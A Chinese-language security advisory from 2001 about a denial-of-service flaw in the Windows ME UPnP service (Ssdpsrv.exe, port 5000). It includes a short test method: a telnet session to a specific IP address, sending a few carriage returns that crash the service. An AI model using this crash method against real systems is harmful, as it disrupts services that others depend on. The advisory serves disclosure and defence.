发布日期：2001-10-18
更新日期：2001-10-19

受影响系统：

Microsoft WindowsME

描述：

---

Ssdpsrv.exe是WindowsME上提供UPnP服务的程序，该服务是每次开机自动启动的，默认
端口是5000。

该服务存在安全漏洞，通过连接该端口并输入3到5个回车，就可以导致该服务崩溃，只有重新启
动才能恢复正常功能。

<*来源：milo omega (mtwoar@hotmail.com)
  参考：http://archives.neohapsis.com/archives/bugtraq/2001-10/0133.html
*>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

milo omega (mtwoar@hotmail.com)提供了如下测试方法：

<snip>
  bash-2.05$ telnet 165.121.234.217 5000
  Trying 165.121.234.217...
  Connected to 165.121.234.217.
  Escape character is '^]'.


  HTTP/1.1 400 Bad Request


  Connection closed by foreign host.
  bash-2.05$
</snap>

错误信息为：

  Ssdpsrv has caused an error in MSVCRT.DLL.
  Ssdpsrv will now close.


建议：

---

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.microsoft.com/


浏览次数：3873
严重程度：0（网友投票）